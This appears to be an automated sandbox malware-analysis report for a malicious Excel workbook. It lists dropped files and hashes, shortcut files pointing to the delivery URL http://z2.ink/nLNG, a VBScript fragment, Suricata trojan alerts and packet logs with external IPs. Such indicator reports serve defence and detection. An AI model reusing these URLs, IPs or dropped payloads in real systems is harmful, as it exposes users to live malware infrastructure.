            MD5:5CE3FB79EE6C60C1A8598EB838F65EE9
            SHA1:42CD18B04B86642F7B4EF6DBA35BE29AA1A9407C
            SHA-256:AE88629ABE441163B2F3DEA9D0D8B5AA97FCECC20673B6AE9D7AD3633BEE1B74
            SHA-512:DCDF1CE7CCAF4E0DD9EAC7FEAF64368E6867DE5F0C25CD3D30E75AB7C6EE34B1E32687F48F5826D6392E59F2F794B3C915D7885A9D00E6AA1195B08F3193360C
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Generic INItialization configuration [xls]
            Category:modified
            Size (bytes):104
            Entropy (8bit):4.6614482522919465
            Encrypted:false
            SSDEEP:3:bDCE4LZXHlyMgLp6lmMYEyMgLp6lv:bmTZXsrLp6xY3rLp61
            MD5:A174FE7EEED4840D94F4D3B9778092CA
            SHA1:409397EB44BEC23FC3F71859E49670408CA60F3D
            SHA-256:AD4DF6C72323783796827F917B8CADAD7FDAD3A5BFA8DCC62F5A633DD9BD64D5
            SHA-512:DEE73741ABED0DC58B2315CD7FCFFC0CB3A72858090C3FC6E97123317620BD1B48DD42A10948A6C78207F75137F5D2EE16E9B90A5E97DBD99888137C51FBC7FC
            Malicious:false
            Preview:[folders]..nLNG.url=0..z2.ink.url=0..Ref19920830281982938RT.LNK=0..[xls]..Ref19920830281982938RT.LNK=0..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nLNG>), ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):44
            Entropy (8bit):4.544325652580698
            Encrypted:false
            SSDEEP:3:HRAbABGQYm/5XGuyn:HRYFVm/5XSn
            MD5:66F53BD633596486420FCA4738ECFAAF
            SHA1:9D87EE7A931B50A15600CAC90A43C0C176940721
            SHA-256:F1E3011CC9E1C19AEBE58AD9D1E98A05A06A0CACB885A0A12D683EFFA56A74EC
            SHA-512:C450DEA170B1647885A600B28CC7A892EB0EAB9CD3DF2F7628FCF045D05CDDF7219B150C2CC2A243C9A6E8BF03C21ECED8B732B3AB5B0F2DC25EAE65E3DEAF5C
            Malicious:true
            Preview:[InternetShortcut]..URL=http://z2.ink/nLNG..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):40
            Entropy (8bit):4.446439344671015
            Encrypted:false
            SSDEEP:3:HRAbABGQYm/5XG8n:HRYFVm/5XJn
            MD5:7F1FACEA6A36B544AC585A5173C32BBC
            SHA1:2B9A9BA3C87CEF7C19ED56EEBA30731D250D4726
            SHA-256:2A4741F9C5EDC7138E16555F591135B3258319D3DFF94D7864AF06AB73E66262
            SHA-512:16E1F8B87EF5D39867FF4B82D4F472EA059680C3344FFEF3F033F6410F9FA0D6626FB16E43DC041AB56606EBEFFC444D3CCC088581C18038DC32A9BC7318E41A
            Malicious:true
            Preview:[InternetShortcut]..URL=http://z2.ink/..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVywgmbVWtUykLC+ln:vdsCkWt3gmoUyd+l
            MD5:B37CE9E8345F9558D8E3AFB62D07B0DF
            SHA1:99057A85C270AC5FACCB9F49E1FEA3E73B1BC5BD
            SHA-256:B0542FB818F2CBEA824C83BE01289ED036D9BDF164970A75B018F43E26547FA4
            SHA-512:88C7BEFCBB413DA42095ADFFF91AA82350181FF6162718D0A98B4A2E6D472499B3647C3E33A119326A134AA96D9D97984E73695F1D4C59F29F06484E2CAC325F
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):156322
            Entropy (8bit):3.2657606017650114
            Encrypted:false
            SSDEEP:1536:Eokd99CObC6iLcme9aJK6CUrQhfW0/5JZUlBcNBg0BAbUZlu9gISsRQ:LkdvaJK62/2czg0BAcv
            MD5:AF216517B1AC9254BCFF5C37E6E80752
            SHA1:A5BED501BC6EC2A6E555D96FF175910CADB10B81
            SHA-256:AA849B703BB5635313B8CABE1F08C6BB0F5BCE5FA9D75260DA988584DA7A7471
            SHA-512:3ACDBF49F9D7A6E466E309E49CA66B9EB911F47B686E9753AC4DC23EE8149D330F767E79A808844CE1E2462153A4580B60D2D280FB1B29DC1855EF61AD675F82
            Malicious:true
            Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 08:00:58 2024, Security: 1
            Category:dropped
            Size (bytes):315904
            Entropy (8bit):7.961923710839547
            Encrypted:false
            SSDEEP:6144:JKHTgwUpRuqFkQERyOO5UsH893Ba2P748xW8U8Ap:K4uqrIzyH89xaSPxY86
            MD5:4D5E80215E1B09A79626F6594A90C360
            SHA1:C6CF6E8DF73FB055BC3CBEBEC7D3F2A07B644D47
            SHA-256:279D14B0AEB2A99BA9576D71C71E840FE16A3D17BDFC215D1B19B7DE6A827971
            SHA-512:F5C398025E6A541C7428BCCAF614286D28BF5B772EBCD2B3D659203C7C288C1932B9BE5F6AACE60C5893C5815D6412BA49C1C9D0CB525A1031C50C55A7861879
            Malicious:false
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 08:00:58 2024, Security: 1
            Category:dropped
            Size (bytes):315904
            Entropy (8bit):7.961923710839547
            Encrypted:false
            SSDEEP:6144:JKHTgwUpRuqFkQERyOO5UsH893Ba2P748xW8U8Ap:K4uqrIzyH89xaSPxY86
            MD5:4D5E80215E1B09A79626F6594A90C360
            SHA1:C6CF6E8DF73FB055BC3CBEBEC7D3F2A07B644D47
            SHA-256:279D14B0AEB2A99BA9576D71C71E840FE16A3D17BDFC215D1B19B7DE6A827971
            SHA-512:F5C398025E6A541C7428BCCAF614286D28BF5B772EBCD2B3D659203C7C288C1932B9BE5F6AACE60C5893C5815D6412BA49C1C9D0CB525A1031C50C55A7861879
            Malicious:false
            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 01:42:46 2024, Security: 1
            Entropy (8bit):7.9104018405793175
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:Ref19920830281982938RT.xls
            File size:315'392 bytes
            MD5:f5051793b6c98a29efba84f3821d1e30
            SHA1:b6b446e72525796444ae132fbb6af6788f08c5de
            SHA256:191a46b3849f0cc60ac2e0a3387585dd9c34e2b28cb66bffdbda08238ee53710
            SHA512:f8be2d2f6596deb0aac8d4770ba3cde80a39f3abdda9f9c32e0fd337c3a127fb518220bfad65528d29b9c4fa23a2312cadc08f9e2a3ababf1c9be4d44db9a9f6
            SSDEEP:6144:QKHTwu2pQHTIIwJsl5mAwKTwVbE7s9NEfUuqMQTZabPYDX:5QAExhKTWESoQTUPYD
            TLSH:2B6412E6315BC167C243C0B48CC2E1E7FBA8FE938F9656073392334E54762524A23A5E
            Icon Hash:276ea3a6a6b7bfbf
            Document Type:OLE
            Number of OLE Files:1
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:True
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Code Page:1252
            Author:
            Last Saved By:
            Create Time:2006-09-16 00:00:00
            Last Saved Time:2024-05-27 00:42:46
            Creating Application:Microsoft Excel
            Security:1
            Document Code Page:1252
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:786432
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1.cls
            Stream Size:977
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2.cls
            Stream Size:977
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
            VBA File Name:Sheet3.cls
            Stream Size:977
            Attribute VB_Name = "Sheet3"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook.cls
            Stream Size:985
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.889430592781307
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:200
            Entropy:3.2603503175049817
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . .
            General
            Stream Path:MBD001E4BEB/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            General
            Stream Path:MBD001E4BEB/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:15635
            Entropy:7.539342686431913
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            General
            Stream Path:MBD001E4BEC/\x1Ole
            CLSID:
            File Type:data
            Stream Size:624
            Entropy:4.685768870238001
            Base64 Encoded:False
            Data ASCII:. . . . 7 _ . . | . . . . . . . . . . . . Z . . . y . . . K . V . . . h . t . t . p . : . / . / . z . 2 . . . i . n . k . / . n . L . N . G . . . h . . K t . . { < . . . % . . ~ ) . 5 s , . w . . . . . . . . . . . . . . . . . . . N . c . V . b . z . a . O . 2 . Y . F . M . 6 . V . h . C . z . C . T . B . Q . u . i . K . 9 . X . v . d . f . m . Z . m . f . d . i . 1 . 9 . q . S . y . k . k . u . S . o . q . G . g . 1 . 3 . i . d . x . w . q . M . 8 . 0 . I . 2 . Q . l . H . h . Y . k . a . 2 . 5 . m . h . e
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:282828
            Entropy:7.998431357621911
            Base64 Encoded:True
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:527
            Entropy:5.25882062681103
            Base64 Encoded:True
            Data ASCII:I D = " { C A F 1 0 1 F C - 7 5 8 5 - 4 E 8 4 - 8 C D D - 1 C A 2 0 2 9 D 7 6 5 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 9 5 B B 2 4 2 B 6 4 2 B 6 4 2 B
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:104
            Entropy:3.0488640812019017
            Base64 Encoded:False
            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:2644
            Entropy:3.993722601822243
            Base64 Encoded:False
            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:data
            Stream Size:553
            Entropy:6.374935342192008
            Base64 Encoded:True
            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . | c h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
            05/27/24-09:00:53.917151 | TCP | 2049038 | ET TROJAN Malicious Base64 Encoded Payload In Image | 443 | 49174 | 188.114.97.3 | 192.168.2.22
            05/27/24-09:00:51.165055 | TCP | 2018856 | ET TROJAN Windows executable base64 encoded | 443 | 49174 | 188.114.97.3 | 192.168.2.22
            05/27/24-09:00:51.165055 | TCP | 2047750 | ET TROJAN Base64 Encoded MZ In Image | 443 | 49174 | 188.114.97.3 | 192.168.2.22
            05/27/24-09:00:58.159972 | TCP | 2020424 | ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 | 80 | 49175 | 198.46.178.154 | 192.168.2.22
            05/27/24-09:00:58.159972 | TCP | 2020423 | ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 | 80 | 49175 | 198.46.178.154 | 192.168.2.22
            05/27/24-09:00:53.346879 | TCP | 2025012 | ET TROJAN Powershell commands sent B64 3 | 443 | 49174 | 188.114.97.3 | 192.168.2.22
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            May 27, 2024 09:00:27.387669086 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.387689114 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.387701035 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.387748957 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.388410091 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476624966 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476660967 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476677895 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476681948 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476696968 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.476706982 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476716995 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.476766109 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.481550932 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481568098 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481584072 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481600046 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.481609106 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.481628895 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.481650114 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486438990 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486457109 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486473083 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486498117 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.486506939 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486506939 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486526966 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.486546993 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491276026 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491292953 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491308928 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491324902 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491328955 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491342068 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.491348982 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491372108 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.491399050 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.496056080 CEST8049162198.46.178.154192.168.2.22
            May 27, 2024 09:00:27.496104002 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:27.941946030 CEST4916280192.168.2.22198.46.178.154
            May 27, 2024 09:00:28.266956091 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.274027109 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.274099112 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.274204016 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.281210899 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.872950077 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873028040 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873080969 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873087883 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873089075 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873117924 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873153925 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873172045 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873172045 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873192072 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873225927 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873231888 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873291016 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873295069 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873307943 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873346090 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.873368025 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873368025 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.873404026 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.877342939 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.877387047 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878297091 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878334999 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878372908 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878407001 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878792048 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878823042 CEST804916354.241.153.192192.168.2.22
            May 27, 2024 09:00:28.878870010 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:28.878870010 CEST4916380192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.250036001 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.255430937 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.255551100 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.255786896 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.260636091 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836250067 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836272955 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836309910 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836363077 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836378098 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836446047 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836457968 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836461067 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836477995 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836494923 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836494923 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836494923 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836509943 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836513996 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.836532116 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836532116 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.836555004 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.837224960 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.837248087 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.841547966 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.841577053 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.841593981 CEST804916454.241.153.192192.168.2.22
            May 27, 2024 09:00:29.841622114 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.841640949 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.841640949 CEST4916480192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.845586061 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.850507021 CEST804916554.241.153.192192.168.2.22
            May 27, 2024 09:00:29.850573063 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.850625992 CEST4916580192.168.2.2254.241.153.192
            May 27, 2024 09:00:29.855479002 CEST804916554.241.153.192192.168.2.22
